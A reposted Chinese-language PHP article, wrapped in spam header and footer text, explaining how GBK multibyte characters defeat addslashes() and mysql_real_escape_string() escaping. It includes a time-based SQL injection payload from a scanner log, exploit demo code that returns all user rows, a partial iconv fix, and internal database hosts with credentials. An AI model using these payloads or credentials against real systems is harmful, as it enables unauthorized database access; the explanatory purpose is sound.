国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 語言 > PHP > 正文

PHP字符編碼繞過漏洞--addslashes、mysql_real_escape漏洞

2024-09-04 11:50:22
字體:
來源:轉載
供稿:網友

在上次活動開發過程中,有個程序寫了下面這樣的語句:

$sName = $_GET['name']; 
$sName = addslashes($sName); 
$sql = "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%$sName%';"; 
var_dump($sql);  
exit(); 

結果掃描工具一掃描,發現問題來了,被掃除了SQL注入漏洞,而且還引發了整個數據表被鎖住(備注:見第二部分)

檢查安全中心掃描日志發現:
當SQL輸入為:
name=41%bf%27%20or%20sleep%2810.10%29%3d0%20limit%201%23
的時候引發了SQL注入。
//這里輸出:
string(98) "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%41¿///' or sleep(10.10)=0 limit 1#%';"


根本原因是addslash對于字符%BF%27的漏洞。


該漏洞最早2006年被國外用來討論數據庫字符集設為GBK時,0xbf27本身不是一個有效的GBK字符,但經過  addslashes()  轉換后變為0xbf5c27,前面的0xbf5c是個有效的GBK字符,所以0xbf5c27會被當作一個字符0xbf5c和一個單引號來處理,結果漏洞就觸發了。
          mysql_real_escape_string() 也存在相同的問題,只不過相比  addslashes() 它考慮到了用什么字符集來處理,因此可以用相應的字符集來處理字符。
在MySQL中有兩種改變默認字符集的方法。
方法一:
改變mysql配置文件my.cnf
 [client]
default-character-set=GBK


方法二:
在建立連接時使用
CODE:
SET  CHARACTER  SET  'GBK'
例:mysql_query("SET  CHARACTER  SET  'gbk'",  $c);或者
mysql_query(“SET NAMES ‘GBK’”, $c);


問題是方法二在改變字符集時mysql_real_escape_string() 并不知道而使用默認字符集處理從而造成和  addslashes()  一樣的漏洞(備注:這句話是摘抄的,我也沒看懂)


網絡上查詢到有人說:
當mysql_real_escape_string檢測到的編碼方式跟client設置的編碼方式(big5/bgk)不一致時,mysql_real_escape_string跟addslashes是沒有區別的 
比如 
[client] 
default-character-set=latin1 


mysql_query("SET  CHARACTER  SET  'gbk'",  $mysql_conn); 
這種情況下mysql_real_escape_string  是基于  latin1工作的,是不安全的 


[client] 
default-character-set=gbk 


mysql_query("SET  CHARACTER  SET  'gbk'",  $mysql_conn); 
這種情況下,mysql_real_escape_string  基于  gbk  工作,是正常的 


但是,這里我108、153上驗證的都不成功:
用12機器的php文件在108機器mysql上,查詢到


在153鏈接測試環境CDB結點:
 
執行來自:
http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的測試代碼
<?php
//$c  =  mysql_connect("localhost",  "user",  "pass");
$c = mysql_connect("10.1.164.108", "oss", "oss_da");
mysql_select_db("a_jasonyeTest", $c);


//$c = mysql_connect("10.179.12.249:3332", "oss", "oss_da");
//mysql_select_db("dbGuild20120903jasonye", $c);


mysql_select_db("database",  $c);


//  change  our  character  set
mysql_query("SET  CHARACTER  SET  'gbk'",  $c);


//  create  demo  table
mysql_query("CREATE  TABLE  users  (
        username  VARCHAR(32)  PRIMARY  KEY,
        password  VARCHAR(32)
)  CHARACTER  SET  'GBK'",  $c);
mysql_query("INSERT  INTO  users  VALUES('foo','bar'),  ('baz','test')",  $c);


//  now  the  exploit  code
$_POST['username']  =  chr(0xbf)  .  chr(0x27)  .  '  OR  username  =  username  #'; 
$_POST['password']  =  'anything'; 


//  Proper  escaping,  we  should  be  safe,  right?
$user  =  mysql_real_escape_string($_POST['username'],  $c);
$passwd  =  mysql_real_escape_string($_POST['password'],  $c);


$sql  =  "SELECT  *  FROM    users  WHERE    username  =  '{$user}'  AND  password  =  '{$passwd}'";
$res  =  mysql_query($sql,  $c);
echo  mysql_num_rows($res);  //  will  print  2,  indicating  that  we  were  able  to  fetch  all  records


?>
發現:都存在漏洞

 


縱觀以上兩種觸發漏洞的關鍵是addslashes()、mysql_real_escape_string()在Mysql配置為GBK時就可以觸發漏洞,
另外:mysql_real_escape_string在執行前,必須正確連接到Mysql才有效。


又有,上面產生漏洞的原因主是有GBK的特殊字符所引起的,因而,我們需要在進行addslashes或者mysql_real_escape之前,對輸入字符串進行特殊處理一下。


$this->sName = $_GET['name'];
$this->sName=iconv('utf-8//IGNORE', 'gbk', $this->sName);
$this->sName=iconv('gbk//IGNORE', 'utf-8', $this->sName);             
Iconv這種方式比較粗暴,對于不能識別的特殊字符之后的語句在153機器上會截斷不能識別的字符后面的內容:
如下:
string(32) "41

主站蜘蛛池模板: 五原县| 稷山县| 民勤县| 响水县| 鹤山市| 寿阳县| 余干县| 广饶县| 孟连| 安塞县| 宣威市| 侯马市| 苏尼特左旗| 长泰县| 襄垣县| 辽宁省| 桐乡市| 乌审旗| 象州县| 金湖县| 丽江市| 崇左市| 贺州市| 龙井市| 通道| 甘孜县| 哈巴河县| 泗洪县| 南木林县| 迁西县| 枣强县| 临澧县| 新津县| 汾西县| 潞城市| 和田县| 信宜市| 股票| 西城区| 天峨县| 汕尾市|